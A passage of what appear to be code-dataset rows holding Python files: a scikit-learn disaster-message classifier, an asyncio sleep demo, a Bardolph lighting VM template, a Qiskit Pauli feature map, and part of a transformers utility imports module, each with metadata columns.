text = text.lower()
# tokenize text
tokens = word_tokenize(text)
# lemmatize and remove stop words
tokens = [lemmatizer.lemmatize(word) for word in tokens if word not in stop_words]
return tokens
class TextLengthExtractor(BaseEstimator, TransformerMixin):
'''The custom transformer will return the number of characters in each message'''
def fit(self, X, y=None):
return self
def transform(self, X):
X_len = pd.Series(X).apply(lambda x: len(x))
#print(pd.DataFrame(X_len))
return pd.DataFrame(X_len)
class POSCounter(BaseEstimator, TransformerMixin):
'''The custom transformer will return the number of nouns, verbs and adjectives for each message'''
def pos_counts(self, text):
sentence_list = nltk.sent_tokenize(text)
noun_count = 0
verb_count = 0
adj_count = 0
for sentence in sentence_list:
pos_tags = nltk.pos_tag(tokenize(sentence))
for w, tag in pos_tags:
# print (w,tag)
if (tag=='NN'): noun_count+=1
elif (tag=='VBZ'): verb_count+=1
elif (tag=='JJ'): adj_count+=1
return noun_count, verb_count, adj_count
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.pos_counts)
columns = ['noun_count', 'verb_count', 'adj_count']
# source: https://stackoverflow.com/questions/53402584/how-to-convert-a-series-of-tuples-into-a-pandas-dataframe
df = pd.DataFrame([[a,b,c] for a,b,c in X_tagged.values], columns=columns)
df.head()
return df
def build_model():
'''The function returns a pipeline containing a model defition.'''
pipeline_mlp = Pipeline([
('features', FeatureUnion([
('text_pipeline', Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer())
])),
('pos_counts', POSCounter()),
('text_len', TextLengthExtractor())
])),
('clf', MultiOutputClassifier(MLPClassifier(hidden_layer_sizes=(10,))))
])
return pipeline_mlp
def evaluate_model(model, X_test, Y_test, category_names):
''' Evaluate Multioutput claffication results and print out the metrics.'''
predictions = model.predict(X_test)
print(classification_report(Y_test, predictions, target_names=category_names))
return
def save_model(model, model_filepath):
'''Saves the model into a pickle file provided.'''
pickle.dump(model, open(model_filepath, 'wb'))
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() | import sys
import pandas as pd
import pickle
from sqlalchemy import create_engine
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.multioutput import MultiOutputClassifier
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import GridSearchCV
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
def load_data(database_filepath):
'''The functions loads data from sqlite database providd the path
It returns the features X, labels Y and the label names.'''
engine = create_engine('sqlite:///'+database_filepath)
df = pd.read_sql("select * from Messages", engine)
print ('Loaded: ', df.shape)
# drop data with no categories assigned
df = df[df['cat_num']>0]
X = df['message']
Y = df.iloc[:, 4:-1]
return X, Y, Y.columns
def tokenize(text):
'''The function will remove punctuation, normalize the text case, lemmatize and remove the stop words'''
stop_words = stopwords.words("english")
lemmatizer = WordNetLemmatizer()
# normalize case and remove punctuation
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
text = text.lower()
# tokenize text
tokens = word_tokenize(text)
# lemmatize and remove stop words
tokens = [lemmatizer.lemmatize(word) for word in tokens if word not in stop_words]
return tokens
class TextLengthExtractor(BaseEstimator, TransformerMixin):
'''The custom transformer will return the number of characters in each message'''
def fit(self, X, y=None):
return self
def transform(self, X):
X_len = pd.Series(X).apply(lambda x: len(x))
#print(pd.DataFrame(X_len))
return pd.DataFrame(X_len)
class POSCounter(BaseEstimator, TransformerMixin):
'''The custom transformer will return the number of nouns, verbs and adjectives for each message'''
def pos_counts(self, text):
sentence_list = nltk.sent_tokenize(text)
noun_count = 0
verb_count = 0
adj_count = 0
for sentence in sentence_list:
pos_tags = nltk.pos_tag(tokenize(sentence))
for w, tag in pos_tags:
# print (w,tag)
if (tag=='NN'): noun_count+=1
elif (tag=='VBZ'): verb_count+=1
elif (tag=='JJ'): adj_count+=1
return noun_count, verb_count, adj_count
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.pos_counts)
columns = ['noun_count', 'verb_count', 'adj_count']
# source: https://stackoverflow.com/questions/53402584/how-to-convert-a-series-of-tuples-into-a-pandas-dataframe
df = pd.DataFrame([[a,b,c] for a,b,c in X_tagged.values], columns=columns)
df.head()
return df
def build_model():
'''The function returns a pipeline containing a model defition.'''
pipeline_mlp = Pipeline([
('features', FeatureUnion([
('text_pipeline', Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer())
])),
('pos_counts', POSCounter()),
('text_len', TextLengthExtractor())
])),
('clf', MultiOutputClassifier(MLPClassifier(hidden_layer_sizes=(10,))))
])
return pipeline_mlp
def evaluate_model(model, X_test, Y_test, category_names):
''' Evaluate Multioutput claffication results and print out the metrics.'''
predictions = model.predict(X_test)
print(classification_report(Y_test, predictions, target_names=category_names))
return
def save_model(model, model_filepath):
'''Saves the model into a pickle file provided.'''
pickle.dump(model, open(model_filepath, 'wb'))
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() | en | 0.640667 | The functions loads data from sqlite database providd the path It returns the features X, labels Y and the label names. # drop data with no categories assigned The function will remove punctuation, normalize the text case, lemmatize and remove the stop words # normalize case and remove punctuation # tokenize text # lemmatize and remove stop words The custom transformer will return the number of characters in each message #print(pd.DataFrame(X_len)) The custom transformer will return the number of nouns, verbs and adjectives for each message # print (w,tag) # source: https://stackoverflow.com/questions/53402584/how-to-convert-a-series-of-tuples-into-a-pandas-dataframe The function returns a pipeline containing a model defition. Evaluate Multioutput claffication results and print out the metrics. Saves the model into a pickle file provided. | 2.871366 | 3 |
standard_lib/async_sleep_sync.py | DahlitzFlorian/python-snippets | 29 | 6632496 | <reponame>DahlitzFlorian/python-snippets
"""
Async snippet demonstrating the usage of time.sleep()
"""
import asyncio
import time
from datetime import datetime
async def custom_sleep():
print("SLEEP", datetime.now())
time.sleep(1)
async def factorial(name, number):
f = 1
for i in range(2, number + 1):
print(f"Task {name}: Compute factorial({i})")
await custom_sleep()
f *= i
print(f"Task {name}: factorial({number}) is {i}\n")
start = time.time()
loop = asyncio.get_event_loop()
tasks = [
asyncio.ensure_future(factorial("A", 3)),
asyncio.ensure_future(factorial("B", 4)),
]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
end = time.time()
print(f"Total time: {end - start}")
| """
Async snippet demonstrating the usage of time.sleep()
"""
import asyncio
import time
from datetime import datetime
async def custom_sleep():
print("SLEEP", datetime.now())
time.sleep(1)
async def factorial(name, number):
f = 1
for i in range(2, number + 1):
print(f"Task {name}: Compute factorial({i})")
await custom_sleep()
f *= i
print(f"Task {name}: factorial({number}) is {i}\n")
start = time.time()
loop = asyncio.get_event_loop()
tasks = [
asyncio.ensure_future(factorial("A", 3)),
asyncio.ensure_future(factorial("B", 4)),
]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
end = time.time()
print(f"Total time: {end - start}") | en | 0.736647 | Async snippet demonstrating the usage of time.sleep() | 4.000955 | 4 |
bardolph/controller/lsc_template.py | al-fontes-jr/bardolph | 0 | 6632497 | #!/usr/bin/env python
import argparse
import logging
from bardolph.lib import injection
from bardolph.lib import settings
from bardolph.controller import arg_helper
from bardolph.controller import config_values
from bardolph.controller import light_module
from bardolph.controller.units import UnitMode
from bardolph.vm import machine
from bardolph.vm.instruction import Instruction, OpCode
from bardolph.vm.vm_codes import IoOp, JumpCondition, LoopVar, Operand, Operator
from bardolph.vm.vm_codes import Register, SetOp
_assembly = [
#instructions
]
_param_counts = {op_code: 0 for op_code in (OpCode.BREAKPOINT, OpCode.COLOR,
OpCode.DISC, OpCode.END_LOOP, OpCode.GET_COLOR, OpCode.LOOP, OpCode.NOP,
OpCode.PAUSE, OpCode.STOP, OpCode.POWER, OpCode.WAIT)}
_param_counts.update({op_code: 1 for op_code in (OpCode.DISCM, OpCode.DNEXT,
OpCode.END, OpCode.JSR, OpCode.OP, OpCode.POP, OpCode.PUSH, OpCode.PUSHQ,
OpCode.ROUTINE)})
_param_counts.update({op_code: 2 for op_code in (OpCode.CONSTANT, OpCode.DNEXTM,
OpCode.JUMP, OpCode.MOVE, OpCode.MOVEQ, OpCode.OUT, OpCode.PARAM,
OpCode.TIME_PATTERN)})
def get_assembly():
current_instruction = 0
while current_instruction < len(_assembly):
value = _assembly[current_instruction]
current_instruction += 1
yield value
def build_instructions():
program = []
it = iter(get_assembly())
op_code = next(it, None)
while op_code is not None:
param_count = _param_counts[OpCode(op_code)]
param0 = None if param_count < 1 else next(it)
param1 = None if param_count < 2 else next(it)
program.append(Instruction(op_code, param0, param1))
op_code = next(it, None)
return program
def main():
injection.configure()
ap = argparse.ArgumentParser()
ap.add_argument(
'-v', '--verbose', help='do debug-level logging', action='store_true')
ap.add_argument(
'-f', '--fakes', help='use fake lights', action='store_true')
arg_helper.add_n_argument(ap)
args = ap.parse_args()
overrides = {
'sleep_time': 0.1
}
if args.verbose:
overrides['log_level'] = logging.DEBUG
overrides['log_to_console'] = True
if args.fakes:
overrides['use_fakes'] = True
n_arg = arg_helper.get_overrides(args)
if n_arg is not None and not args.fakes:
overrides.update(n_arg)
settings_init = settings.using(config_values.functional)
settings_init.add_overrides(overrides).configure()
light_module.configure()
machine.Machine().run(build_instructions())
if __name__ == '__main__':
main()
| #!/usr/bin/env python
import argparse
import logging
from bardolph.lib import injection
from bardolph.lib import settings
from bardolph.controller import arg_helper
from bardolph.controller import config_values
from bardolph.controller import light_module
from bardolph.controller.units import UnitMode
from bardolph.vm import machine
from bardolph.vm.instruction import Instruction, OpCode
from bardolph.vm.vm_codes import IoOp, JumpCondition, LoopVar, Operand, Operator
from bardolph.vm.vm_codes import Register, SetOp
_assembly = [
#instructions
]
_param_counts = {op_code: 0 for op_code in (OpCode.BREAKPOINT, OpCode.COLOR,
OpCode.DISC, OpCode.END_LOOP, OpCode.GET_COLOR, OpCode.LOOP, OpCode.NOP,
OpCode.PAUSE, OpCode.STOP, OpCode.POWER, OpCode.WAIT)}
_param_counts.update({op_code: 1 for op_code in (OpCode.DISCM, OpCode.DNEXT,
OpCode.END, OpCode.JSR, OpCode.OP, OpCode.POP, OpCode.PUSH, OpCode.PUSHQ,
OpCode.ROUTINE)})
_param_counts.update({op_code: 2 for op_code in (OpCode.CONSTANT, OpCode.DNEXTM,
OpCode.JUMP, OpCode.MOVE, OpCode.MOVEQ, OpCode.OUT, OpCode.PARAM,
OpCode.TIME_PATTERN)})
def get_assembly():
current_instruction = 0
while current_instruction < len(_assembly):
value = _assembly[current_instruction]
current_instruction += 1
yield value
def build_instructions():
program = []
it = iter(get_assembly())
op_code = next(it, None)
while op_code is not None:
param_count = _param_counts[OpCode(op_code)]
param0 = None if param_count < 1 else next(it)
param1 = None if param_count < 2 else next(it)
program.append(Instruction(op_code, param0, param1))
op_code = next(it, None)
return program
def main():
injection.configure()
ap = argparse.ArgumentParser()
ap.add_argument(
'-v', '--verbose', help='do debug-level logging', action='store_true')
ap.add_argument(
'-f', '--fakes', help='use fake lights', action='store_true')
arg_helper.add_n_argument(ap)
args = ap.parse_args()
overrides = {
'sleep_time': 0.1
}
if args.verbose:
overrides['log_level'] = logging.DEBUG
overrides['log_to_console'] = True
if args.fakes:
overrides['use_fakes'] = True
n_arg = arg_helper.get_overrides(args)
if n_arg is not None and not args.fakes:
overrides.update(n_arg)
settings_init = settings.using(config_values.functional)
settings_init.add_overrides(overrides).configure()
light_module.configure()
machine.Machine().run(build_instructions())
if __name__ == '__main__':
main()
| ru | 0.172319 | #!/usr/bin/env python #instructions | 2.035261 | 2 |
qiskit/aqua/components/feature_maps/pauli_expansion.py | aaita92/qiskit-aqua | 2 | 6632498 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
This module contains the definition of a base class for
feature map. Several types of commonly used approaches.
"""
from typing import Optional, Callable, List
import itertools
import logging
import numpy as np
from qiskit import QuantumCircuit, QuantumRegister
from qiskit.quantum_info import Pauli
from qiskit.qasm import pi
from qiskit.aqua.operators import evolution_instruction
from qiskit.aqua.utils.validation import validate_min, validate_in_set
from .feature_map import FeatureMap
from .data_mapping import self_product
logger = logging.getLogger(__name__)
# pylint: disable=invalid-name
class PauliExpansion(FeatureMap):
"""
Mapping data with the second order expansion followed by entangling gates.
Refer to https://arxiv.org/pdf/1804.11326.pdf for details.
"""
def __init__(self,
feature_dimension: int,
depth: int = 2,
entangler_map: Optional[List[List[int]]] = None,
entanglement: str = 'full',
paulis: Optional[List[str]] = None,
data_map_func: Callable[[np.ndarray], float] = self_product) -> None:
"""Constructor.
Args:
feature_dimension: number of features
depth: the number of repeated circuits. Defaults to 2,
has a min. value of 1.
entangler_map: describe the connectivity of qubits, each list describes
[source, target], or None for full entanglement.
Note that the order is the list is the order of
applying the two-qubit gate.
entanglement: ['full', 'linear'], generate the qubit
connectivity by predefined topology.
Defaults to full
paulis: a list of strings for to-be-used paulis.
Defaults to None. If None, ['Z', 'ZZ'] will be used.
data_map_func: a mapping function for data x
"""
paulis = paulis if paulis is not None else ['Z', 'ZZ']
validate_min('depth', depth, 1)
validate_in_set('entanglement', entanglement, {'full', 'linear'})
super().__init__()
self._num_qubits = self._feature_dimension = feature_dimension
self._depth = depth
if entangler_map is None:
self._entangler_map = self.get_entangler_map(entanglement, feature_dimension)
else:
self._entangler_map = self.validate_entangler_map(entangler_map, feature_dimension)
self._pauli_strings = self._build_subset_paulis_string(paulis)
self._data_map_func = data_map_func
self._support_parameterized_circuit = True
def _build_subset_paulis_string(self, paulis):
# fill out the paulis to the number of qubits
temp_paulis = []
for pauli in paulis:
len_pauli = len(pauli)
for possible_pauli_idx in itertools.combinations(range(self._num_qubits), len_pauli):
string_temp = ['I'] * self._num_qubits
for idx, _ in enumerate(possible_pauli_idx):
string_temp[-possible_pauli_idx[idx] - 1] = pauli[-idx - 1]
temp_paulis.append(''.join(string_temp))
# clean up string that can not be entangled.
final_paulis = []
for pauli in temp_paulis:
where_z = np.where(np.asarray(list(pauli[::-1])) != 'I')[0]
if len(where_z) == 1:
final_paulis.append(pauli)
else:
is_valid = True
for src, targ in itertools.combinations(where_z, 2):
if [src, targ] not in self._entangler_map:
is_valid = False
break
if is_valid:
final_paulis.append(pauli)
else:
logger.warning("Due to the limited entangler_map,"
" %s is skipped.", pauli)
logger.info("Pauli terms include: %s", final_paulis)
return final_paulis
def _extract_data_for_rotation(self, pauli, x):
where_non_i = np.where(np.asarray(list(pauli[::-1])) != 'I')[0]
x = np.asarray(x)
return x[where_non_i]
def construct_circuit(self, x, qr=None, inverse=False):
"""
Construct the second order expansion based on given data.
Args:
x (Union(numpy.ndarray, list[Parameter], ParameterVector)): 1-D to-be-transformed data.
qr (QuantumRegister, optional): the QuantumRegister object for the circuit, if None,
generate new registers with name q.
inverse (bool, optional): whether or not inverse the circuit
Returns:
QuantumCircuit: a quantum circuit transform data x.
Raises:
TypeError: invalid input
ValueError: invalid input
"""
if len(x) != self._num_qubits:
raise ValueError("number of qubits and data dimension must be the same.")
if qr is None:
qr = QuantumRegister(self._num_qubits, name='q')
qc = QuantumCircuit(qr)
for _ in range(self._depth):
for i in range(self._num_qubits):
qc.u2(0, pi, qr[i])
for pauli in self._pauli_strings:
coeff = self._data_map_func(self._extract_data_for_rotation(pauli, x))
p = Pauli.from_label(pauli)
inst = evolution_instruction([[1, p]], coeff, 1)
qc.append(inst, qr)
return qc
| # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
This module contains the definition of a base class for
feature map. Several types of commonly used approaches.
"""
from typing import Optional, Callable, List
import itertools
import logging
import numpy as np
from qiskit import QuantumCircuit, QuantumRegister
from qiskit.quantum_info import Pauli
from qiskit.qasm import pi
from qiskit.aqua.operators import evolution_instruction
from qiskit.aqua.utils.validation import validate_min, validate_in_set
from .feature_map import FeatureMap
from .data_mapping import self_product
logger = logging.getLogger(__name__)
# pylint: disable=invalid-name
class PauliExpansion(FeatureMap):
"""
Mapping data with the second order expansion followed by entangling gates.
Refer to https://arxiv.org/pdf/1804.11326.pdf for details.
"""
def __init__(self,
feature_dimension: int,
depth: int = 2,
entangler_map: Optional[List[List[int]]] = None,
entanglement: str = 'full',
paulis: Optional[List[str]] = None,
data_map_func: Callable[[np.ndarray], float] = self_product) -> None:
"""Constructor.
Args:
feature_dimension: number of features
depth: the number of repeated circuits. Defaults to 2,
has a min. value of 1.
entangler_map: describe the connectivity of qubits, each list describes
[source, target], or None for full entanglement.
Note that the order is the list is the order of
applying the two-qubit gate.
entanglement: ['full', 'linear'], generate the qubit
connectivity by predefined topology.
Defaults to full
paulis: a list of strings for to-be-used paulis.
Defaults to None. If None, ['Z', 'ZZ'] will be used.
data_map_func: a mapping function for data x
"""
paulis = paulis if paulis is not None else ['Z', 'ZZ']
validate_min('depth', depth, 1)
validate_in_set('entanglement', entanglement, {'full', 'linear'})
super().__init__()
self._num_qubits = self._feature_dimension = feature_dimension
self._depth = depth
if entangler_map is None:
self._entangler_map = self.get_entangler_map(entanglement, feature_dimension)
else:
self._entangler_map = self.validate_entangler_map(entangler_map, feature_dimension)
self._pauli_strings = self._build_subset_paulis_string(paulis)
self._data_map_func = data_map_func
self._support_parameterized_circuit = True
def _build_subset_paulis_string(self, paulis):
# fill out the paulis to the number of qubits
temp_paulis = []
for pauli in paulis:
len_pauli = len(pauli)
for possible_pauli_idx in itertools.combinations(range(self._num_qubits), len_pauli):
string_temp = ['I'] * self._num_qubits
for idx, _ in enumerate(possible_pauli_idx):
string_temp[-possible_pauli_idx[idx] - 1] = pauli[-idx - 1]
temp_paulis.append(''.join(string_temp))
# clean up string that can not be entangled.
final_paulis = []
for pauli in temp_paulis:
where_z = np.where(np.asarray(list(pauli[::-1])) != 'I')[0]
if len(where_z) == 1:
final_paulis.append(pauli)
else:
is_valid = True
for src, targ in itertools.combinations(where_z, 2):
if [src, targ] not in self._entangler_map:
is_valid = False
break
if is_valid:
final_paulis.append(pauli)
else:
logger.warning("Due to the limited entangler_map,"
" %s is skipped.", pauli)
logger.info("Pauli terms include: %s", final_paulis)
return final_paulis
def _extract_data_for_rotation(self, pauli, x):
where_non_i = np.where(np.asarray(list(pauli[::-1])) != 'I')[0]
x = np.asarray(x)
return x[where_non_i]
def construct_circuit(self, x, qr=None, inverse=False):
"""
Construct the second order expansion based on given data.
Args:
x (Union(numpy.ndarray, list[Parameter], ParameterVector)): 1-D to-be-transformed data.
qr (QuantumRegister, optional): the QuantumRegister object for the circuit, if None,
generate new registers with name q.
inverse (bool, optional): whether or not inverse the circuit
Returns:
QuantumCircuit: a quantum circuit transform data x.
Raises:
TypeError: invalid input
ValueError: invalid input
"""
if len(x) != self._num_qubits:
raise ValueError("number of qubits and data dimension must be the same.")
if qr is None:
qr = QuantumRegister(self._num_qubits, name='q')
qc = QuantumCircuit(qr)
for _ in range(self._depth):
for i in range(self._num_qubits):
qc.u2(0, pi, qr[i])
for pauli in self._pauli_strings:
coeff = self._data_map_func(self._extract_data_for_rotation(pauli, x))
p = Pauli.from_label(pauli)
inst = evolution_instruction([[1, p]], coeff, 1)
qc.append(inst, qr)
return qc
| en | 0.751068 | # -*- coding: utf-8 -*- # This code is part of Qiskit. # # (C) Copyright IBM 2018, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. This module contains the definition of a base class for feature map. Several types of commonly used approaches. # pylint: disable=invalid-name Mapping data with the second order expansion followed by entangling gates. Refer to https://arxiv.org/pdf/1804.11326.pdf for details. Constructor. Args: feature_dimension: number of features depth: the number of repeated circuits. Defaults to 2, has a min. value of 1. entangler_map: describe the connectivity of qubits, each list describes [source, target], or None for full entanglement. Note that the order is the list is the order of applying the two-qubit gate. entanglement: ['full', 'linear'], generate the qubit connectivity by predefined topology. Defaults to full paulis: a list of strings for to-be-used paulis. Defaults to None. If None, ['Z', 'ZZ'] will be used. data_map_func: a mapping function for data x # fill out the paulis to the number of qubits # clean up string that can not be entangled. Construct the second order expansion based on given data. Args: x (Union(numpy.ndarray, list[Parameter], ParameterVector)): 1-D to-be-transformed data. qr (QuantumRegister, optional): the QuantumRegister object for the circuit, if None, generate new registers with name q. inverse (bool, optional): whether or not inverse the circuit Returns: QuantumCircuit: a quantum circuit transform data x. Raises: TypeError: invalid input ValueError: invalid input | 2.26276 | 2 |
src/transformers/utils/__init__.py | aakashb95/transformers | 0 | 6632499 | #!/usr/bin/env python
# coding=utf-8
# flake8: noqa
# There's no way to ignore "F401 '...' imported but unused" warnings in this
# module, but to preserve other warnings. So, don't check this module at all.
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from packaging import version
from .. import __version__
from .doc import (
add_code_sample_docstrings,
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
copy_func,
replace_return_docstrings,
)
from .generic import (
ContextManagers,
ExplicitEnum,
ModelOutput,
PaddingStrategy,
TensorType,
cached_property,
find_labels,
flatten_dict,
is_tensor,
to_numpy,
to_py_obj,
)
from .hub import (
CLOUDFRONT_DISTRIB_PREFIX,
DISABLE_TELEMETRY,
HF_MODULES_CACHE,
HUGGINGFACE_CO_PREFIX,
HUGGINGFACE_CO_RESOLVE_ENDPOINT,
PYTORCH_PRETRAINED_BERT_CACHE,
PYTORCH_TRANSFORMERS_CACHE,
S3_BUCKET_PREFIX,
TRANSFORMERS_CACHE,
TRANSFORMERS_DYNAMIC_MODULE_NAME,
EntryNotFoundError,
PushToHubMixin,
RepositoryNotFoundError,
RevisionNotFoundError,
cached_path,
default_cache_path,
define_sagemaker_information,
filename_to_url,
get_cached_models,
get_file_from_repo,
get_from_cache,
get_full_repo_name,
get_list_of_files,
has_file,
hf_bucket_url,
http_get,
http_user_agent,
is_local_clone,
is_offline_mode,
is_remote_url,
send_example_telemetry,
url_to_filename,
)
from .import_utils import (
ENV_VARS_TRUE_AND_AUTO_VALUES,
ENV_VARS_TRUE_VALUES,
TORCH_FX_REQUIRED_VERSION,
USE_JAX,
USE_TF,
USE_TORCH,
DummyObject,
OptionalDependencyNotAvailable,
_LazyModule,
is_accelerate_available,
is_apex_available,
is_bitsandbytes_available,
is_coloredlogs_available,
is_datasets_available,
is_detectron2_available,
is_faiss_available,
is_flax_available,
is_ftfy_available,
is_in_notebook,
is_ipex_available,
is_librosa_available,
is_onnx_available,
is_pandas_available,
is_phonemizer_available,
is_protobuf_available,
is_psutil_available,
is_py3nvml_available,
is_pyctcdecode_available,
is_pytesseract_available,
is_pytorch_quantization_available,
is_rjieba_available,
is_sagemaker_dp_enabled,
is_sagemaker_mp_enabled,
is_scatter_available,
is_scipy_available,
is_sentencepiece_available,
is_sklearn_available,
is_soundfile_availble,
is_spacy_available,
is_speech_available,
is_tensorflow_probability_available,
is_tf2onnx_available,
is_tf_available,
is_timm_available,
is_tokenizers_available,
is_torch_available,
is_torch_bf16_available,
is_torch_cuda_available,
is_torch_fx_available,
is_torch_fx_proxy,
is_torch_onnx_dict_inputs_support_available,
is_torch_tf32_available,
is_torch_tpu_available,
is_torchaudio_available,
is_torchdynamo_available,
is_training_run_on_sagemaker,
is_vision_available,
requires_backends,
tf_required,
torch_only_method,
torch_required,
torch_version,
)
WEIGHTS_NAME = "pytorch_model.bin"
WEIGHTS_INDEX_NAME = "pytorch_model.bin.index.json"
TF2_WEIGHTS_NAME = "tf_model.h5"
TF_WEIGHTS_NAME = "model.ckpt"
FLAX_WEIGHTS_NAME = "flax_model.msgpack"
CONFIG_NAME = "config.json"
FEATURE_EXTRACTOR_NAME = "preprocessor_config.json"
MODEL_CARD_NAME = "modelcard.json"
SENTENCEPIECE_UNDERLINE = "▁"
SPIECE_UNDERLINE = SENTENCEPIECE_UNDERLINE # Kept for backward compatibility
MULTIPLE_CHOICE_DUMMY_INPUTS = [
[[0, 1, 0, 1], [1, 0, 0, 1]]
] * 2 # Needs to have 0s and 1s only since XLM uses it for langs too.
DUMMY_INPUTS = [[7, 6, 0, 0, 1], [1, 2, 3, 0, 0], [0, 0, 0, 4, 5]]
DUMMY_MASK = [[1, 1, 1, 1, 1], [1, 1, 1, 0, 0], [0, 0, 0, 1, 1]]
def check_min_version(min_version):
if version.parse(__version__) < version.parse(min_version):
if "dev" in min_version:
error_message = (
"This example requires a source install from HuggingFace Transformers (see "
"`https://huggingface.co/transformers/installation.html#installing-from-source`),"
)
else:
error_message = f"This example requires a minimum version of {min_version},"
error_message += f" but the version found is {__version__}.\n"
raise ImportError(
error_message
+ "Check out https://huggingface.co/transformers/examples.html for the examples corresponding to other "
"versions of HuggingFace Transformers."
)
| #!/usr/bin/env python
# coding=utf-8
# flake8: noqa
# There's no way to ignore "F401 '...' imported but unused" warnings in this
# module, but to preserve other warnings. So, don't check this module at all.
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from packaging import version
from .. import __version__
from .doc import (
add_code_sample_docstrings,
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
copy_func,
replace_return_docstrings,
)
from .generic import (
ContextManagers,
ExplicitEnum,
ModelOutput,
PaddingStrategy,
TensorType,
cached_property,
find_labels,
flatten_dict,
is_tensor,
to_numpy,
to_py_obj,
)
from .hub import (
CLOUDFRONT_DISTRIB_PREFIX,
DISABLE_TELEMETRY,
HF_MODULES_CACHE,
HUGGINGFACE_CO_PREFIX,
HUGGINGFACE_CO_RESOLVE_ENDPOINT,
PYTORCH_PRETRAINED_BERT_CACHE,
PYTORCH_TRANSFORMERS_CACHE,
S3_BUCKET_PREFIX,
TRANSFORMERS_CACHE,
TRANSFORMERS_DYNAMIC_MODULE_NAME,
EntryNotFoundError,
PushToHubMixin,
RepositoryNotFoundError,
RevisionNotFoundError,
cached_path,
default_cache_path,
define_sagemaker_information,
filename_to_url,
get_cached_models,
get_file_from_repo,
get_from_cache,
get_full_repo_name,
get_list_of_files,
has_file,
hf_bucket_url,
http_get,
http_user_agent,
is_local_clone,
is_offline_mode,
is_remote_url,
send_example_telemetry,
url_to_filename,
)
from .import_utils import (
ENV_VARS_TRUE_AND_AUTO_VALUES,
ENV_VARS_TRUE_VALUES,
TORCH_FX_REQUIRED_VERSION,
USE_JAX,
USE_TF,
USE_TORCH,
DummyObject,
OptionalDependencyNotAvailable,
_LazyModule,
is_accelerate_available,
is_apex_available,
is_bitsandbytes_available,
is_coloredlogs_available,
is_datasets_available,
is_detectron2_available,
is_faiss_available,
is_flax_available,
is_ftfy_available,
is_in_notebook,
is_ipex_available,
is_librosa_available,
is_onnx_available,
is_pandas_available,
